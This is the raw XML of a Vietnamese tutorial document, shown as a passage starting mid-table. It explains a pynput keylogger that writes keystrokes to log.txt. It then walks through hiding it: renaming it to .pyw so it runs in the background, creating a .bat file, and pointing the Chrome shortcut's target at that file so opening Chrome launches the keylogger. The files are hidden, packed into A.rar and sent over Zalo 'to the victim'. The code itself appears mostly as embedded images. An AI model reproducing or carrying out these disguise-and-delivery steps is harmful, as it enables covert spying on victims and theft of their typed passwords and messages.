              <w:t>(4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B32962" w14:textId="119B4B46" w:rsidR="00A35F50" w:rsidRDefault="007375CB" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="007375CB">
              <w:t>    hacker.join()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FEF872B" w14:textId="77777777" w:rsidR="00A35F50" w:rsidRDefault="007375CB" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Nội dung keylogger.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA8C664" w14:textId="77777777" w:rsidR="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Dòng này nhập lớp Listener từ thư viện pynput.keyboard. Listener là một phần của thư viện cho phép bạn theo dõi các sự kiện bàn phím (keyboard events).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6011AF90" w14:textId="77777777" w:rsidR="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(2)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Đây là hàm được gọi mỗi khi một phím được nhấn. Hàm này nhận một đối số key, đại diện cho phím vừa được nhấn.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CDE4D6" w14:textId="77777777" w:rsidR="005E5CFB" w:rsidRPr="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="005E5CFB">
            <w:r w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(3)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Mở file log.txt ở chế độ "append" (thêm vào) ("a"), cho phép ghi các phím mới mà không làm mất nội dung cũ.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD0B218" w14:textId="77777777" w:rsidR="005E5CFB" w:rsidRPr="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="005E5CFB">
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Dòng file.write(key) ghi lại giá trị của key vào file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B57520E" w14:textId="77777777" w:rsidR="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="005E5CFB">
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Cuối cùng, print(key) in ra giá trị của key trên màn hình console.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E371566" w14:textId="1FB4D81C" w:rsidR="005E5CFB" w:rsidRPr="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="005E5CFB">
            <w:r w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(4)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidRPr="005E5CFB">
              <w:t>Tạo một đối tượng Listener, truyền hàm anonymous để xử lý các sự kiện phím nhấn.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C477E8D" w14:textId="0783C75F" w:rsidR="005E5CFB" w:rsidRDefault="005E5CFB" w:rsidP="005E5CFB">
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidRPr="005E5CFB">
              <w:t>hacker.join() sẽ giữ cho Listener hoạt động cho đến khi nó bị dừng (trong trường hợp này là khi nhấn phím F12).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="23C9D05D" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE59F16" w14:textId="3D00087E" w:rsidR="00A35F50" w:rsidRDefault="00715A5F" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="00715A5F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4552A63C" wp14:editId="0EC02B2F">
                  <wp:extent cx="1019317" cy="266737"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="62995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53975" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1019317" cy="266737"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A150767" w14:textId="5F2C5628" w:rsidR="00A35F50" w:rsidRDefault="00715A5F" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Đổi định dạng .py -&gt; .pyw (có tác dụng là khi đóng terminal thì nó vẫn ch</w:t>
            </w:r>
            <w:r w:rsidR="006F29CD">
              <w:t>ạ</w:t>
            </w:r>
            <w:r>
              <w:t>y ngầm, chỉ khi tắt ở trên task manager thì mới được)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="15D7A659" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="104B4060" w14:textId="122E179D" w:rsidR="00A35F50" w:rsidRDefault="006F29CD" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="006F29CD">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4C9BA9" wp14:editId="4EFC49A8">
                  <wp:extent cx="895475" cy="390580"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="29381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16134" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="895475" cy="390580"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F16C61" w14:textId="3E1AA9EB" w:rsidR="00A35F50" w:rsidRDefault="006F29CD" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Mún tắt thì bật task manager lên và tắt chương trình python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="05115AAA" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D156765" w14:textId="2B0F3CC7" w:rsidR="00A35F50" w:rsidRDefault="0087249B" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="0087249B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029B60C2" wp14:editId="04C69F49">
                  <wp:extent cx="3542506" cy="3254828"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
                  <wp:docPr id="70826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64086" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3548865" cy="3260671"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092C56FA" w14:textId="4C48D916" w:rsidR="00A35F50" w:rsidRDefault="0087249B" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Chọn Open file location, copy shortcut của gg chrom rồi thả vào nằm bên cạnh file keylogger.pyw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="3762A02F" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CFD4D3" w14:textId="4456E96F" w:rsidR="00A35F50" w:rsidRDefault="0087249B" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="0087249B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55462EE0" wp14:editId="00812244">
                  <wp:extent cx="3391373" cy="1981477"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="138290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05010" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3391373" cy="1981477"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B101486" w14:textId="77777777" w:rsidR="00A35F50" w:rsidRDefault="0087249B" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Click phải chọn Properties thì thấy target, đó là nơi thực thi khi mình click đúp vào shortcut gg chrome</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F61CC6D" w14:textId="77777777" w:rsidR="00CB553D" w:rsidRDefault="00CB553D" w:rsidP="00CB553D">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E8"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Giờ tạo 1 file .bat để thực thi keylogger.pyw khi user vừa click vào ggchrome</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11244473" w14:textId="05EC42C0" w:rsidR="009679FC" w:rsidRDefault="00CB553D" w:rsidP="00CB553D">
            <w:r>
              <w:t>(file .bat có chức năng là thay mình sử dụng terminal 1 cách tự động với các lệnh đã được cấu hình trong .bat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="0DFF5B8F" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA7EB96" w14:textId="0E95C03A" w:rsidR="00A35F50" w:rsidRDefault="00CB553D" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="002E60C8">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21FC3D0D" wp14:editId="64BED63D">
                  <wp:extent cx="2229161" cy="809738"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="82585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52347" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2229161" cy="809738"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E05C265" w14:textId="6217F2DE" w:rsidR="00A35F50" w:rsidRDefault="00CB553D" w:rsidP="00CB553D">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E8"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Tạo file .bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="7A5FB637" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0DF0E2" w14:textId="2F2B3012" w:rsidR="0087249B" w:rsidRDefault="00CB553D" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="00CB553D">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B5FFD6D" wp14:editId="4C89F7C4">
                  <wp:extent cx="3439005" cy="2038635"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="58929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99507" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3439005" cy="2038635"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60B46DB5" w14:textId="06255932" w:rsidR="00CB553D" w:rsidRDefault="00CB553D" w:rsidP="00CB553D">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E8"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Sửa Targer chrome = đường dẫn thực thi .bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADF0F6E" w14:textId="6F2B06E5" w:rsidR="0087249B" w:rsidRDefault="0087249B" w:rsidP="004C4EBF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="79FB5D0E" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44DE5238" w14:textId="59FC8999" w:rsidR="0087249B" w:rsidRDefault="0030393C" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="0030393C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48379064" wp14:editId="33E70CE5">
                  <wp:extent cx="2928937" cy="743925"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="0"/>
                  <wp:docPr id="60014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44181" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2967003" cy="753593"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63D7D1BB" w14:textId="77777777" w:rsidR="0087249B" w:rsidRDefault="00CB553D" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Edit file .bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2004FA19" w14:textId="71F7F465" w:rsidR="00D81A16" w:rsidRDefault="00D81A16" w:rsidP="004C4EBF">
            <w:r>
              <w:t xml:space="preserve">- vì ở đâu cùng ổ đĩa C nên có thể thực thi dễ, nếu khác ổ đĩa thì phải có lệnh cd (coi trong </w:t>
            </w:r>
            <w:r w:rsidR="00802C6C">
              <w:t xml:space="preserve">link </w:t>
            </w:r>
            <w:r>
              <w:t>youtube)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB07E3" w14:paraId="71FF9C91" w14:textId="77777777" w:rsidTr="00512BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0728895E" w14:textId="77777777" w:rsidR="00FB07E3" w:rsidRDefault="00FB07E3" w:rsidP="004C4EBF">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E8"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Bấm ggchrome thì sẽ thực thi file .bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5D3678" w14:textId="2DC0DC46" w:rsidR="00FB07E3" w:rsidRDefault="00FB07E3" w:rsidP="004C4EBF">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E8"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> .bat mở ggchrome và .pyw để làm gián điệp (bấm F12 thì sẽ dừng chương trình gián điệp lại do trong .pyw có cấu hình lệnh dừng, nếu ko thì có thể dô task manager để tắt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007643DE" w14:paraId="58F18C7F" w14:textId="77777777" w:rsidTr="00051363">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="2BEA5CA9" w14:textId="22A2CB78" w:rsidR="007643DE" w:rsidRDefault="007643DE" w:rsidP="007643DE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007643DE">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Giấu File</w:t>
            </w:r>
            <w:r w:rsidR="00CA7259">
              <w:t xml:space="preserve"> (coi link (2))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="585024D9" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70EA87F3" w14:textId="652FB9D7" w:rsidR="0087249B" w:rsidRDefault="00094D12" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="00094D12">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72F9563A" wp14:editId="626DE934">
                  <wp:extent cx="2457793" cy="990738"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="108216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63986" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2457793" cy="990738"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10382A22" w14:textId="77777777" w:rsidR="00094D12" w:rsidRDefault="00094D12" w:rsidP="00094D12">
            <w:r>
              <w:t>- Biến .bat với .pyw thành 2 file ẩn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="706E7374" w14:textId="77777777" w:rsidR="0087249B" w:rsidRDefault="0087249B" w:rsidP="004C4EBF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="0BF6680C" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A26E7A" w14:textId="77777777" w:rsidR="0087249B" w:rsidRDefault="0087249B" w:rsidP="004C4EBF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B684A83" w14:textId="58317A9A" w:rsidR="00094D12" w:rsidRDefault="00094D12" w:rsidP="00094D12">
            <w:r>
              <w:t>- Nén chung lại với ggchrome</w:t>
            </w:r>
            <w:r w:rsidR="00CA7259">
              <w:t>, đặt tên thành A.rar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13750967" w14:textId="7B419F22" w:rsidR="0087249B" w:rsidRDefault="0087249B" w:rsidP="004C4EBF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="777FCB7A" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07024D9C" w14:textId="77777777" w:rsidR="0087249B" w:rsidRDefault="0087249B" w:rsidP="004C4EBF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E680474" w14:textId="6E0567F4" w:rsidR="0087249B" w:rsidRDefault="00CA7259" w:rsidP="004C4EBF">
            <w:r>
              <w:t>- Gửi qua zalo cho nạn nhân</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A66D38" w14:paraId="53FF71A5" w14:textId="77777777" w:rsidTr="00C82508">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="62D4D655" w14:textId="77777777" w:rsidR="00A66D38" w:rsidRDefault="00A66D38" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Thực thi được với điều kiện là máy bên kia phải cài đc pynput &amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidR="00CA7259">
              <w:t xml:space="preserve"> A.rar đó được để trong thư mục D:\A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="383E95A3" w14:textId="7C886F3E" w:rsidR="00CA7259" w:rsidRDefault="00CA7259" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Cái này thì chỉ ghi được lịch sử gõ trên 1 máy thôi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C815B68" w14:textId="77777777" w:rsidR="004C4EBF" w:rsidRDefault="004C4EBF" w:rsidP="004C4EBF"/>
    <w:sectPr w:rsidR="004C4EBF" w:rsidSect="00AC1348">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1440" w:right="72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34788"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC08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8796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516"/>
    <w:rsid w:val="00094D12"/>
    <w:rsid w:val="000C1D69"/>
    <w:rsid w:val="000C48AA"/>
    <w:rsid w:val="00113D50"/>
    <w:rsid w:val="001C2B01"/>
    <w:rsid w:val="001D5A3B"/>
    <w:rsid w:val="00234FD5"/>
    <w:rsid w:val="002E01EE"/>
    <w:rsid w:val="002E2F8E"/>
    <w:rsid w:val="002E60C8"/>
    <w:rsid w:val="0030393C"/>
    <w:rsid w:val="003202C3"/>
    <w:rsid w:val="003837C7"/>
    <w:rsid w:val="003A533C"/>
    <w:rsid w:val="003A7E83"/>
    <w:rsid w:val="003B1CC5"/>
    <w:rsid w:val="0042190C"/>
    <w:rsid w:val="00435504"/>
    <w:rsid w:val="00441D5C"/>
    <w:rsid w:val="00445D8F"/>
    <w:rsid w:val="004627A5"/>
    <w:rsid w:val="004C4EBF"/>
    <w:rsid w:val="005048F4"/>
    <w:rsid w:val="005E5CFB"/>
    <w:rsid w:val="0063641A"/>
    <w:rsid w:val="00687B51"/>
    <w:rsid w:val="006960F4"/>
    <w:rsid w:val="006F29CD"/>
    <w:rsid w:val="00702B4C"/>
    <w:rsid w:val="00715A5F"/>
    <w:rsid w:val="007375CB"/>
    <w:rsid w:val="0074134D"/>
    <w:rsid w:val="007643DE"/>
    <w:rsid w:val="007A660A"/>
    <w:rsid w:val="00802C6C"/>
    <w:rsid w:val="008310DE"/>
    <w:rsid w:val="0087249B"/>
    <w:rsid w:val="00874647"/>
    <w:rsid w:val="0087725F"/>
    <w:rsid w:val="008B046F"/>
    <w:rsid w:val="00957EC1"/>
    <w:rsid w:val="00967801"/>
    <w:rsid w:val="009679FC"/>
    <w:rsid w:val="009B4984"/>
    <w:rsid w:val="009D5B32"/>
    <w:rsid w:val="00A20851"/>
    <w:rsid w:val="00A35F50"/>
    <w:rsid w:val="00A66D38"/>
    <w:rsid w:val="00A81145"/>
    <w:rsid w:val="00A849B2"/>
    <w:rsid w:val="00AC1348"/>
    <w:rsid w:val="00AD2323"/>
    <w:rsid w:val="00AD3F71"/>
    <w:rsid w:val="00B00EEB"/>
    <w:rsid w:val="00B16A2E"/>
    <w:rsid w:val="00B904AE"/>
    <w:rsid w:val="00BA5E49"/>
    <w:rsid w:val="00C21EB5"/>
    <w:rsid w:val="00C27EDA"/>
    <w:rsid w:val="00C505CB"/>
    <w:rsid w:val="00C75EE5"/>
    <w:rsid w:val="00CA7259"/>
    <w:rsid w:val="00CB553D"/>
    <w:rsid w:val="00CE6BD2"/>
    <w:rsid w:val="00D16781"/>
    <w:rsid w:val="00D24FBA"/>
    <w:rsid w:val="00D75845"/>
    <w:rsid w:val="00D80A00"/>
    <w:rsid w:val="00D81A16"/>
    <w:rsid w:val="00DB2752"/>
    <w:rsid w:val="00E60486"/>
    <w:rsid w:val="00E65516"/>
    <w:rsid w:val="00E75DBF"/>
    <w:rsid w:val="00EC5638"/>
    <w:rsid w:val="00EC58CF"/>
    <w:rsid w:val="00F516D6"/>
    <w:rsid w:val="00FB07E3"/>
    <w:rsid w:val="00FE3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67162"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{839CC678-5AD1-492D-B6D9-8305B7694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2752"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB2752"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D80A00"/>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039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776151">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="932395242">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
